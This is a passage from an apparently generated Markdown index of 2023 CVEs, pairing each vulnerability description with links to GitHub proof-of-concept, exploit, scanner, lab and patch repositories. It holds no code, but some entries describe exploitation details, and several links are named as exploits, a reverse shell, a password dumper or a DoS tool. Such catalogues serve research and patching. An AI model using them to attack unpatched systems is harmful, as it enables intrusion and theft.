- [Vulmatch/CVE-2023-28252](https://github.com/Vulmatch/CVE-2023-28252)

### CVE-2023-28324 (2023-06-30)

An improper input validation vulnerability exists in Ivanti Endpoint Manager 2022 and below that could allow privilege escalation or remote code execution.

- [horizon3ai/CVE-2023-28324](https://github.com/horizon3ai/CVE-2023-28324)

### CVE-2023-28329 (2023-03-23)

Insufficient validation of profile field availability condition resulted in an SQL injection risk (by default only available to teachers and managers).

- [cli-ish/CVE-2023-28329](https://github.com/cli-ish/CVE-2023-28329)

### CVE-2023-28330 (2023-03-23)

Insufficient sanitizing in backup resulted in an arbitrary file read risk. The capability to access this feature is only available to teachers, managers and admins by default.

- [cli-ish/CVE-2023-28330](https://github.com/cli-ish/CVE-2023-28330)

### CVE-2023-28343 (2023-03-14)

OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.

- [gobysec/CVE-2023-28343](https://github.com/gobysec/CVE-2023-28343)
- [superzerosec/CVE-2023-28343](https://github.com/superzerosec/CVE-2023-28343)
- [hba343434/CVE-2023-28343](https://github.com/hba343434/CVE-2023-28343)

### CVE-2023-28432 (2023-03-22)

Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including `MINIO_SECRET_KEY` and `MINIO_ROOT_PASSWORD`, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.

- [Mr-xn/CVE-2023-28432](https://github.com/Mr-xn/CVE-2023-28432)
- [gobysec/CVE-2023-28432](https://github.com/gobysec/CVE-2023-28432)
- [Okaytc/minio_unauth_check](https://github.com/Okaytc/minio_unauth_check)
- [MzzdToT/CVE-2023-28432](https://github.com/MzzdToT/CVE-2023-28432)
- [acheiii/CVE-2023-28432](https://github.com/acheiii/CVE-2023-28432)
- [steponeerror/Cve-2023-28432-](https://github.com/steponeerror/Cve-2023-28432-)
- [Cuerz/CVE-2023-28432](https://github.com/Cuerz/CVE-2023-28432)
- [LHXHL/Minio-CVE-2023-28432](https://github.com/LHXHL/Minio-CVE-2023-28432)
- [h0ng10/CVE-2023-28432_docker](https://github.com/h0ng10/CVE-2023-28432_docker)
- [CHINA-china/MinIO_CVE-2023-28432_EXP](https://github.com/CHINA-china/MinIO_CVE-2023-28432_EXP)
- [TaroballzChen/CVE-2023-28432-metasploit-scanner](https://github.com/TaroballzChen/CVE-2023-28432-metasploit-scanner)
- [bingtangbanli/CVE-2023-28432](https://github.com/bingtangbanli/CVE-2023-28432)
- [Chocapikk/CVE-2023-28432](https://github.com/Chocapikk/CVE-2023-28432)
- [yTxZx/CVE-2023-28432](https://github.com/yTxZx/CVE-2023-28432)
- [unam4/CVE-2023-28432-minio_update_rce](https://github.com/unam4/CVE-2023-28432-minio_update_rce)
- [C1ph3rX13/CVE-2023-28432](https://github.com/C1ph3rX13/CVE-2023-28432)
- [netuseradministrator/CVE-2023-28432](https://github.com/netuseradministrator/CVE-2023-28432)
- [xk-mt/CVE-2023-28432](https://github.com/xk-mt/CVE-2023-28432)
- [0xRulez/CVE-2023-28432](https://github.com/0xRulez/CVE-2023-28432)

### CVE-2023-28434 (2023-03-22)

Minio is a Multi-Cloud Object Storage framework. Prior to RELEASE.2023-03-20T20-16-18Z, an attacker can use crafted requests to bypass metadata bucket name checking and put an object into any bucket while processing `PostPolicyBucket`. To carry out this attack, the attacker requires credentials with `arn:aws:s3:::*` permission, as well as enabled Console API access. This issue has been patched in RELEASE.2023-03-20T20-16-18Z. As a workaround, enable browser API access and turn off `MINIO_BROWSER=off`.

- [AbelChe/evil_minio](https://github.com/AbelChe/evil_minio)

### CVE-2023-28447 (2023-03-28)

Smarty is a template engine for PHP. In affected versions smarty did not properly escape javascript code. An attacker could exploit this vulnerability to execute arbitrary JavaScript code in the context of the user's browser session. This may lead to unauthorized access to sensitive user data, manipulation of the web application's behavior, or unauthorized actions performed on behalf of the user. Users are advised to upgrade to either version 3.1.48 or to 4.3.1 to resolve this issue. There are no known workarounds for this vulnerability.

- [drkbcn/lblfixer_cve_2023_28447](https://github.com/drkbcn/lblfixer_cve_2023_28447)

### CVE-2023-28467 (2023-05-22)

In MyBB before 1.8.34, there is XSS in the User CP module via the user email field.

- [ahmetaltuntas/CVE-2023-28467](https://github.com/ahmetaltuntas/CVE-2023-28467)

### CVE-2023-28588 (2023-12-05)

Transient DOS in Bluetooth Host during rfc slot allocation.

- [uthrasri/CVE-2023-28588](https://github.com/uthrasri/CVE-2023-28588)
- [Trinadh465/CVE-2023-28588](https://github.com/Trinadh465/CVE-2023-28588)
- [uthrasri/CVE-2023-28588_system_bt](https://github.com/uthrasri/CVE-2023-28588_system_bt)
- [uthrasri/CVE-2023-28588_Singlefile](https://github.com/uthrasri/CVE-2023-28588_Singlefile)
- [uthrasri/G2.5_CVE-2023-28588](https://github.com/uthrasri/G2.5_CVE-2023-28588)
- [uthrasri/CVE-2023-28588_G2.5_singlefile](https://github.com/uthrasri/CVE-2023-28588_G2.5_singlefile)

### CVE-2023-28753 (2023-05-18)

netconsd prior to v0.2 was vulnerable to an integer overflow in its parse_packet function. A malicious individual could leverage this overflow to create heap memory corruption with attacker controlled data.

- [pingjuiliao/CVE-2023-28753](https://github.com/pingjuiliao/CVE-2023-28753)

### CVE-2023-28771 (2023-04-25)

Improper error message handling in Zyxel ZyWALL/USG series firmware versions 4.60 through 4.73, VPN series firmware versions 4.60 through 5.35, USG FLEX series firmware versions 4.60 through 5.35, and ATP series firmware versions 4.60 through 5.35, which could allow an unauthenticated attacker to execute some OS commands remotely by sending crafted packets to an affected device.

- [benjaminhays/CVE-2023-28771-PoC](https://github.com/benjaminhays/CVE-2023-28771-PoC)

### CVE-2023-28772 (2023-03-23)

An issue was discovered in the Linux kernel before 5.13.3. lib/seq_buf.c has a seq_buf_putmem_hex buffer overflow.

- [Trinadh465/linux-4.1.15_CVE-2023-28772](https://github.com/Trinadh465/linux-4.1.15_CVE-2023-28772)
- [Satheesh575555/linux-4.1.15_CVE-2023-28772](https://github.com/Satheesh575555/linux-4.1.15_CVE-2023-28772)
- [hshivhare67/kernel_v4.1.15_CVE-2023-28772](https://github.com/hshivhare67/kernel_v4.1.15_CVE-2023-28772)

### CVE-2023-28810 (2023-06-15)

Some access control/intercom products have unauthorized modification of device network configuration vulnerabilities. Attackers can modify device network configuration by sending specific data packets to the vulnerable interface within the same local network.

- [skylightcyber/CVE-2023-28810](https://github.com/skylightcyber/CVE-2023-28810)

### CVE-2023-29007 (2023-04-25)

Git is a revision control system. Prior to versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1, a specially crafted `.gitmodules` file with submodule URLs that are longer than 1024 characters can be used to exploit a bug in `config.c::git_config_copy_or_rename_section_in_file()`. This bug can be used to inject arbitrary configuration into a user's `$GIT_DIR/config` when attempting to remove the configuration section associated with that submodule. When the attacker injects configuration values which specify executables to run (such as `core.pager`, `core.editor`, `core.sshCommand`, etc.) this can lead to a remote code execution. A fix is available in versions 2.30.9, 2.31.8, 2.32.7, 2.33.8, 2.34.8, 2.35.8, 2.36.6, 2.37.7, 2.38.5, 2.39.3, and 2.40.1. As a workaround, avoid running `git submodule deinit` on untrusted repositories or without prior inspection of any submodule sections in `$GIT_DIR/config`.

- [ethiack/CVE-2023-29007](https://github.com/ethiack/CVE-2023-29007)
- [omespino/CVE-2023-29007](https://github.com/omespino/CVE-2023-29007)
- [x-Defender/CVE-2023-29007_win-version](https://github.com/x-Defender/CVE-2023-29007_win-version)

### CVE-2023-29017 (2023-04-06)

vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. Prior to version 3.9.15, vm2 was not properly handling host objects passed to `Error.prepareStackTrace` in case of unhandled async errors. A threat actor could bypass the sandbox protections to gain remote code execution rights on the host running the sandbox. This vulnerability was patched in the release of version 3.9.15 of vm2. There are no known workarounds.

- [timb-machine-mirrors/seongil-wi-CVE-2023-29017](https://github.com/timb-machine-mirrors/seongil-wi-CVE-2023-29017)
- [passwa11/CVE-2023-29017-reverse-shell](https://github.com/passwa11/CVE-2023-29017-reverse-shell)

### CVE-2023-29084 (2023-04-13)

Zoho ManageEngine ADManager Plus before 7181 allows for authenticated users to exploit command injection via Proxy settings.

- [ohnonoyesyes/CVE-2023-29084](https://github.com/ohnonoyesyes/CVE-2023-29084)

### CVE-2023-29324 (2023-05-09)

Windows MSHTML Platform Security Feature Bypass Vulnerability

- [OLeDouxEt/CVE-2023-29324_Patch_Deploy](https://github.com/OLeDouxEt/CVE-2023-29324_Patch_Deploy)

### CVE-2023-29336 (2023-05-09)

Win32k Elevation of Privilege Vulnerability

- [m-cetin/CVE-2023-29336](https://github.com/m-cetin/CVE-2023-29336)

### CVE-2023-29343 (2023-05-09)

SysInternals Sysmon for Windows Elevation of Privilege Vulnerability

- [Wh04m1001/CVE-2023-29343](https://github.com/Wh04m1001/CVE-2023-29343)

### CVE-2023-29357 (2023-06-13)

Microsoft SharePoint Server Elevation of Privilege Vulnerability

- [Chocapikk/CVE-2023-29357](https://github.com/Chocapikk/CVE-2023-29357)
- [LuemmelSec/CVE-2023-29357](https://github.com/LuemmelSec/CVE-2023-29357)
- [KeyStrOke95/CVE-2023-29357-ExE](https://github.com/KeyStrOke95/CVE-2023-29357-ExE)
- [Guillaume-Risch/cve-2023-29357-Sharepoint](https://github.com/Guillaume-Risch/cve-2023-29357-Sharepoint)
- [Jev1337/CVE-2023-29357-Check](https://github.com/Jev1337/CVE-2023-29357-Check)
- [AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357](https://github.com/AhmedMansour93/Event-ID-189-Rule-Name-SOC227-CVE-2023-29357)

### CVE-2023-29360 (2023-06-13)

Microsoft Streaming Service Elevation of Privilege Vulnerability

- [Nero22k/cve-2023-29360](https://github.com/Nero22k/cve-2023-29360)
- [0xDivyanshu-new/CVE-2023-29360](https://github.com/0xDivyanshu-new/CVE-2023-29360)

### CVE-2023-29384 (2023-12-20)

Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0.

- [nastar-id/CVE-2023-29384](https://github.com/nastar-id/CVE-2023-29384)

### CVE-2023-29406 (2023-07-11)

The HTTP/1 client does not fully validate the contents of the Host header. A maliciously crafted Host header can inject additional headers or entire requests. With fix, the HTTP/1 client now refuses to send requests containing an invalid Request.Host or Request.URL.Host value.

- [LuizGustavoP/EP3_Redes](https://github.com/LuizGustavoP/EP3_Redes)

### CVE-2023-29409 (2023-08-02)

Extremely large RSA keys in certificate chains can cause a client/server to expend significant CPU time verifying signatures. With fix, the size of RSA keys transmitted during handshakes is restricted to <= 8192 bits. Based on a survey of publicly trusted RSA keys, there are currently only three certificates in circulation with keys larger than this, and all three appear to be test certificates that are not actively deployed. It is possible there are larger keys in use in private PKIs, but we target the web PKI, so causing breakage here in the interests of increasing the default safety of users of crypto/tls seems reasonable.

- [mateusz834/CVE-2023-29409](https://github.com/mateusz834/CVE-2023-29409)

### CVE-2023-29439 (2023-05-16)

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.

- [LOURC0D3/CVE-2023-29439](https://github.com/LOURC0D3/CVE-2023-29439)

### CVE-2023-29478 (2023-04-07)

BiblioCraft before 2.4.6 does not sanitize path-traversal characters in filenames, allowing restricted write access to almost anywhere on the filesystem. This includes the Minecraft mods folder, which results in code execution.

- [Exopteron/BiblioRCE](https://github.com/Exopteron/BiblioRCE)

### CVE-2023-29489 (2023-04-27)

An issue was discovered in cPanel before 11.109.9999.116. XSS can occur on the cpsrvd error page via an invalid webcall ID, aka SEC-669. The fixed versions are 11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31.

- [learnerboy88/CVE-2023-29489](https://github.com/learnerboy88/CVE-2023-29489)
- [xKore123/cPanel-CVE-2023-29489](https://github.com/xKore123/cPanel-CVE-2023-29489)
- [ipk1/CVE-2023-29489.py](https://github.com/ipk1/CVE-2023-29489.py)
- [Mostafa-Elguerdawi/CVE-2023-29489.yaml](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489.yaml)
- [Mostafa-Elguerdawi/CVE-2023-29489](https://github.com/Mostafa-Elguerdawi/CVE-2023-29489)
- [whalebone7/EagleEye](https://github.com/whalebone7/EagleEye)
- [0-d3y/CVE-2023-29489](https://github.com/0-d3y/CVE-2023-29489)
- [Abdullah7-ma/CVE-2023-29489](https://github.com/Abdullah7-ma/CVE-2023-29489)
- [tucommenceapousser/CVE-2023-29489](https://github.com/tucommenceapousser/CVE-2023-29489)
- [tucommenceapousser/CVE-2023-29489.py](https://github.com/tucommenceapousser/CVE-2023-29489.py)
- [ViperM4sk/cpanel-xss-177](https://github.com/ViperM4sk/cpanel-xss-177)
- [S4muraiMelayu1337/CVE-2023-29489](https://github.com/S4muraiMelayu1337/CVE-2023-29489)
- [SynixCyberCrimeMy/CVE-2023-29489](https://github.com/SynixCyberCrimeMy/CVE-2023-29489)
- [Makurorororororororo/Validate-CVE-2023-29489-scanner-](https://github.com/Makurorororororororo/Validate-CVE-2023-29489-scanner-)
- [prasad-1808/tool-29489](https://github.com/prasad-1808/tool-29489)
- [mdaseem03/cpanel_xss_2023](https://github.com/mdaseem03/cpanel_xss_2023)
- [some-man1/CVE-2023-29489](https://github.com/some-man1/CVE-2023-29489)
- [Cappricio-Securities/CVE-2023-29489](https://github.com/Cappricio-Securities/CVE-2023-29489)
- [md-thalal/CVE-2023-29489](https://github.com/md-thalal/CVE-2023-29489)

### CVE-2023-29808 (2023-05-12)

Cross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code.

- [zPrototype/CVE-2023-29808](https://github.com/zPrototype/CVE-2023-29808)

### CVE-2023-29809 (2023-05-12)

SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request.

- [zPrototype/CVE-2023-29809](https://github.com/zPrototype/CVE-2023-29809)

### CVE-2023-29839 (2023-05-03)

A Stored Cross Site Scripting (XSS) vulnerability exists in multiple pages of Hotel Druid version 3.0.4, which allows arbitrary execution of commands. The vulnerable fields are Surname, Name, and Nickname in the Document function.

- [jichngan/CVE-2023-29839](https://github.com/jichngan/CVE-2023-29839)

### CVE-2023-29919 (2023-05-23)

SolarView Compact <= 6.0 is vulnerable to Insecure Permissions. Any file on the server can be read or modified because texteditor.php is not restricted.

- [xiaosed/CVE-2023-29919](https://github.com/xiaosed/CVE-2023-29919)

### CVE-2023-29922 (2023-04-19)

PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface.

- [CN016/Powerjob-CVE-2023-29922-](https://github.com/CN016/Powerjob-CVE-2023-29922-)

### CVE-2023-29923 (2023-04-19)

PowerJob V4.3.1 is vulnerable to Insecure Permissions via the list job interface.

- [1820112015/CVE-2023-29923](https://github.com/1820112015/CVE-2023-29923)
- [3yujw7njai/CVE-2023-29923-Scan](https://github.com/3yujw7njai/CVE-2023-29923-Scan)
- [Le1a/CVE-2023-29923](https://github.com/Le1a/CVE-2023-29923)

### CVE-2023-29929 (2024-08-21)

Buffer Overflow vulnerability found in Kemptechnologies Loadmaster before v.7.2.60.0 allows a remote attacker to cause a denial of service via the libkemplink.so, isreverse library.

- [YSaxon/CVE-2023-29929](https://github.com/YSaxon/CVE-2023-29929)

### CVE-2023-29930 (2023-05-10)

An issue was found in Genesys CIC Polycom phone provisioning TFTP Server (all versions) that allows a remote attacker to execute arbitrary code via the login credentials to the TFTP server configuration page.

- [YSaxon/TFTPlunder](https://github.com/YSaxon/TFTPlunder)

### CVE-2023-29983 (2023-05-12)

Cross Site Scripting vulnerability found in Maximilian Vogt cmaps v.8.0 allows a remote attacker to execute arbitrary code via the auditlog tab in the admin panel.

- [zPrototype/CVE-2023-29983](https://github.com/zPrototype/CVE-2023-29983)

### CVE-2023-30033
- [phucodeexp/CVE-2023-30033](https://github.com/phucodeexp/CVE-2023-30033)

### CVE-2023-30092 (2023-05-08)

SourceCodester Online Pizza Ordering System v1.0 is vulnerable to SQL Injection via the QTY parameter.

- [nawed20002/CVE-2023-30092](https://github.com/nawed20002/CVE-2023-30092)

### CVE-2023-30145 (2023-05-26)

Camaleon CMS v2.7.0 was discovered to contain a Server-Side Template Injection (SSTI) vulnerability via the formats parameter.

- [paragbagul111/CVE-2023-30145](https://github.com/paragbagul111/CVE-2023-30145)

### CVE-2023-30146 (2023-08-04)

Assmann Digitus Plug&View IP Camera HT-IP211HDP, version 2.000.022 allows unauthenticated attackers to download a copy of the camera's settings and the administrator credentials.

- [L1-0/CVE-2023-30146](https://github.com/L1-0/CVE-2023-30146)

### CVE-2023-30185 (2023-05-08)

CRMEB v4.4 to v4.6 was discovered to contain an arbitrary file upload vulnerability via the component \attachment\SystemAttachmentServices.php.

- [c7w1n/CVE-2023-30185](https://github.com/c7w1n/CVE-2023-30185)

### CVE-2023-30190
- [MojithaR/CVE-2023-30190-FOLLINA](https://github.com/MojithaR/CVE-2023-30190-FOLLINA)

### CVE-2023-30212 (2023-04-26)

OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php.

- [kuttappu123/CVE-2023-30212-LAB](https://github.com/kuttappu123/CVE-2023-30212-LAB)
- [Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE](https://github.com/Rishipatidar/CVE-2023-30212-POC-DOCKER-FILE)
- [mallutrojan/CVE-2023-30212-Lab](https://github.com/mallutrojan/CVE-2023-30212-Lab)
- [Anandhu990/CVE-2023-30212_lab](https://github.com/Anandhu990/CVE-2023-30212_lab)
- [libas7994/CVE-2023-30212](https://github.com/libas7994/CVE-2023-30212)
- [libasmon/Vulnerable-Docker-Environment-CVE-2023-30212](https://github.com/libasmon/Vulnerable-Docker-Environment-CVE-2023-30212)
- [libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212](https://github.com/libasmon/-create-a-vulnerable-Docker-environment-that-is-susceptible-to-CVE-2023-30212)
- [libasmon/Exploite-CVE-2023-30212-Vulnerability](https://github.com/libasmon/Exploite-CVE-2023-30212-Vulnerability)
- [libas7994/Exploit-the-CVE-2023-30212-vulnerability](https://github.com/libas7994/Exploit-the-CVE-2023-30212-vulnerability)
- [libasv/Exploite-CVE-2023-30212-vulnerability](https://github.com/libasv/Exploite-CVE-2023-30212-vulnerability)
- [kai-iszz/CVE-2023-30212](https://github.com/kai-iszz/CVE-2023-30212)
- [MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability](https://github.com/MaThEw-ViNcEnT/CVE-2023-30212-OURPHP-Vulnerability)
- [arunsnap/CVE-2023-30212-POC](https://github.com/arunsnap/CVE-2023-30212-POC)
- [VisDev23/Vulnerable-Docker--CVE-2023-30212-](https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-)
- [AAsh035/CVE-2023-30212](https://github.com/AAsh035/CVE-2023-30212)
- [JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-](https://github.com/JasaluRah/Creating-a-Vulnerable-Docker-Environment-CVE-2023-30212-)

### CVE-2023-30226 (2023-07-12)

An issue was discovered in function get_gnu_verneed in rizinorg Rizin prior to 0.5.0 verneed_entry allows attackers to cause a denial of service via crafted elf file.

- [ifyGecko/CVE-2023-30226](https://github.com/ifyGecko/CVE-2023-30226)

### CVE-2023-30253 (2023-05-29)

Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.

- [Rubikcuv5/cve-2023-30253](https://github.com/Rubikcuv5/cve-2023-30253)
- [04Shivam/CVE-2023-30253-Exploit](https://github.com/04Shivam/CVE-2023-30253-Exploit)
- [nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253](https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253)
- [g4nkd/CVE-2023-30253-PoC](https://github.com/g4nkd/CVE-2023-30253-PoC)
- [dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253](https://github.com/dollarboysushil/Dolibarr-17.0.0-Exploit-CVE-2023-30253)
- [andria-dev/DolibabyPhp](https://github.com/andria-dev/DolibabyPhp)
- [bluetoothStrawberry/CVE-2023-30253](https://github.com/bluetoothStrawberry/CVE-2023-30253)

### CVE-2023-30256 (2023-05-11)

Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file.

- [ahrixia/CVE-2023-30256](https://github.com/ahrixia/CVE-2023-30256)

### CVE-2023-30258 (2023-06-23)

Command Injection vulnerability in MagnusSolution magnusbilling 6.x and 7.x allows remote attackers to run arbitrary commands via unauthenticated HTTP request.

- [gy741/CVE-2023-30258-setup](https://github.com/gy741/CVE-2023-30258-setup)

### CVE-2023-30347 (2023-06-22)

Cross Site Scripting (XSS) vulnerability in Neox Contact Center 2.3.9, via the serach_sms_api_name parameter to the SMA API search.

- [huzefa2212/CVE-2023-30347](https://github.com/huzefa2212/CVE-2023-30347)

### CVE-2023-30367 (2023-07-26)

Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory.

- [S1lkys/CVE-2023-30367-mRemoteNG-password-dumper](https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper)

### CVE-2023-30383 (2023-07-18)

TP-LINK Archer C50v2 Archer C50(US)_V2_160801, TP-LINK Archer C20v1 Archer_C20_V1_150707, and TP-LINK Archer C2v1 Archer_C2_US__V1_170228 were discovered to contain a buffer overflow which may lead to a Denial of Service (DoS) when parsing crafted data.

- [a2ure123/CVE-2023-30383](https://github.com/a2ure123/CVE-2023-30383)

### CVE-2023-30458 (2023-04-24)

A username enumeration issue was discovered in Medicine Tracker System 1.0. The login functionality allows a malicious user to guess a valid username due to a different response time from invalid usernames. When one enters a valid username, the response time increases depending on the length of the supplied password.

- [d34dun1c02n/CVE-2023-30458](https://github.com/d34dun1c02n/CVE-2023-30458)

### CVE-2023-30459 (2023-04-14)

SmartPTT SCADA 1.1.0.0 allows remote code execution (when the attacker has administrator privileges) by writing a malicious C# script and executing it on the server (via server settings in the administrator control panel on port 8101, by default).

- [Toxich4/CVE-2023-30459](https://github.com/Toxich4/CVE-2023-30459)

### CVE-2023-30486
- [RandomRobbieBF/CVE-2023-30486](https://github.com/RandomRobbieBF/CVE-2023-30486)

### CVE-2023-30533 (2023-04-24)

SheetJS Community Edition before 0.19.3 allows Prototype Pollution via a crafted file. In other words. 0.19.2 and earlier are affected, whereas 0.19.3 and later are unaffected.

- [BenEdridge/CVE-2023-30533](https://github.com/BenEdridge/CVE-2023-30533)

### CVE-2023-30547 (2023-04-17)

vm2 is a sandbox that can run untrusted code with whitelisted Node's built-in modules. There exists a vulnerability in exception sanitization of vm2 for versions up to 3.9.16, allowing attackers to raise an unsanitized host exception inside `handleException()` which can be used to escape the sandbox and run arbitrary code in host context. This vulnerability was patched in the release of version `3.9.17` of `vm2`. There are no known workarounds for this vulnerability. Users are advised to upgrade.

- [rvizx/CVE-2023-30547](https://github.com/rvizx/CVE-2023-30547)
- [user0x1337/CVE-2023-30547](https://github.com/user0x1337/CVE-2023-30547)
- [Cur1iosity/CVE-2023-30547](https://github.com/Cur1iosity/CVE-2023-30547)
- [junnythemarksman/CVE-2023-30547](https://github.com/junnythemarksman/CVE-2023-30547)

### CVE-2023-30765 (2023-07-10)

Delta Electronics InfraSuite Device Master versions prior to 1.0.7 contain improper access controls that could allow an attacker to alter privilege management configurations, resulting in privilege escalation.

- [0xfml/CVE-2023-30765](https://github.com/0xfml/CVE-2023-30765)

### CVE-2023-30777 (2023-05-10)

Unauth. Reflected Cross-Site Scripting (XSS) vulnerability in WP Engine Advanced Custom Fields Pro, WP Engine Advanced Custom Fields plugins <= 6.1.5 versions.

- [Alucard0x1/CVE-2023-30777](https://github.com/Alucard0x1/CVE-2023-30777)

### CVE-2023-30800 (2023-09-07)

The web server used by MikroTik RouterOS version 6 is affected by a heap memory corruption issue. A remote and unauthenticated attacker can corrupt the server's heap memory by sending a crafted HTTP request. As a result, the web interface crashes and is immediately restarted. The issue was fixed in RouterOS 6.49.10 stable. RouterOS version 7 is not affected.

- [griffinsectio/CVE-2023-30800_PoC](https://github.com/griffinsectio/CVE-2023-30800_PoC)
- [griffinsectio/CVE-2023-30800_PoC_go](https://github.com/griffinsectio/CVE-2023-30800_PoC_go)
- [KhogenTheRabbit/cve-2023-30800-multithread-doser](https://github.com/KhogenTheRabbit/cve-2023-30800-multithread-doser)
- [AxthonyV/MikroTik](https://github.com/AxthonyV/MikroTik)

### CVE-2023-30839 (2023-04-25)

PrestaShop is an Open Source e-commerce web application. Versions prior to 8.0.4 and 1.7.8.9 contain a SQL filtering vulnerability. A BO user can write, update, and delete in the database, even without having specific rights. PrestaShop 8.0.4 and 1.7.8.9 contain a patch for this issue. There are no known workarounds.

- [drkbcn/lblfixer_cve_2023_30839](https://github.com/drkbcn/lblfixer_cve_2023_30839)

### CVE-2023-30845 (2023-04-26)

ESPv2 is a service proxy that provides API management capabilities using Google Service Infrastructure. ESPv2 2.20.0 through 2.42.0 contains an authentication bypass vulnerability. API clients can craft a malicious `X-HTTP-Method-Override` header value to bypass JWT authentication in specific cases.

ESPv2 allows malicious requests to bypass authentication if both of the following conditions are true: the requested HTTP method is **not** in the API service definition (OpenAPI spec or gRPC `google.api.http` proto annotations), and the specified `X-HTTP-Method-Override` is a valid HTTP method in the API service definition. ESPv2 will forward the request to your backend without checking the JWT. Attackers can craft requests with a malicious `X-HTTP-Method-Override` value that allows them to bypass specifying JWTs. Restricting API access with API keys works as intended and is not affected by this vulnerability.

Upgrade deployments to release v2.43.0 or higher to receive a patch. This release ensures that JWT authentication occurs, even when the caller specifies `x-http-method-override`. `x-http-method-override` is still supported by v2.43.0+. API clients can continue sending this header to ESPv2.

- [himori123/-CVE-2023-30845](https://github.com/himori123/-CVE-2023-30845)

### CVE-2023-30854 (2023-04-28)

AVideo is an open source video platform. Prior to version 12.4, an OS Command Injection vulnerability in an authenticated endpoint `/plugin/CloneSite/cloneClient.json.php` allows attackers to achieve Remote Code Execution. This issue is fixed in version 12.4.

- [jmrcsnchz/CVE-2023-30854](https://github.com/jmrcsnchz/CVE-2023-30854)

### CVE-2023-30943 (2023-05-02)

The vulnerability was found in Moodle and exists because the application allows a user to control the path of the folder to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system.

- [d0rb/CVE-2023-30943](https://github.com/d0rb/CVE-2023-30943)
- [Chocapikk/CVE-2023-30943](https://github.com/Chocapikk/CVE-2023-30943)
- [RubyCat1337/CVE-2023-30943](https://github.com/RubyCat1337/CVE-2023-30943)

### CVE-2023-31070
- [bugprove/cve-2023-31070](https://github.com/bugprove/cve-2023-31070)

### CVE-2023-31290 (2023-04-27)

Trust Wallet Core before 3.1.1, as used in the Trust Wallet browser extension before 0.0.183, allows theft of funds because the entropy is 32 bits, as exploited in the wild in December 2022 and March 2023. This occurs because the mt19937 Mersenne Twister takes a single 32-bit value as an input seed, resulting in only four billion possible mnemonics. The affected versions of the browser extension are 0.0.172 through 0.0.182. To steal funds efficiently, an attacker can identify all Ethereum addresses created since the 0.0.172 release, and check whether they are Ethereum addresses that could have been created by this extension. To respond to the risk, affected users need to upgrade the product version and also move funds to a new wallet address.

- [ohexa/py_trustwallet_wasm](https://github.com/ohexa/py_trustwallet_wasm)

### CVE-2023-31320 (2023-11-14)

Improper input validation in the AMD RadeonTM Graphics display driver may allow an attacker to corrupt the display potentially resulting in denial of service.

- [whypet/CVE-2023-31320](https://github.com/whypet/CVE-2023-31320)

### CVE-2023-31346 (2024-02-13)

Failure to initialize memory in SEV Firmware may allow a privileged attacker to access stale data from other guests.

- [Freax13/cve-2023-31346-poc](https://github.com/Freax13/cve-2023-31346-poc)

### CVE-2023-31355 (2024-08-05)

Improper restriction of write operations in SNP firmware could allow a malicious hypervisor to overwrite a guest's UMC seed potentially allowing reading of memory from a decommissioned guest.

- [Freax13/cve-2023-31355-poc](https://github.com/Freax13/cve-2023-31355-poc)

### CVE-2023-31419 (2023-10-26)

A flaw was discovered in Elasticsearch, affecting the _search API that allowed a specially crafted query string to cause a Stack Overflow and ultimately a Denial of Service.

- [sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419](https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419)
- [u238/Elasticsearch-CVE-2023-31419](https://github.com/u238/Elasticsearch-CVE-2023-31419)

### CVE-2023-31433 (2023-05-02)

A SQL injection issue in Logbuch in evasys before 8.2 Build 2286 and 9.x before 9.0 Build 2401 allows authenticated attackers to execute SQL statements via the welche parameter.

- [trustcves/CVE-2023-31433](https://github.com/trustcves/CVE-2023-31433)

### CVE-2023-31434 (2023-05-02)

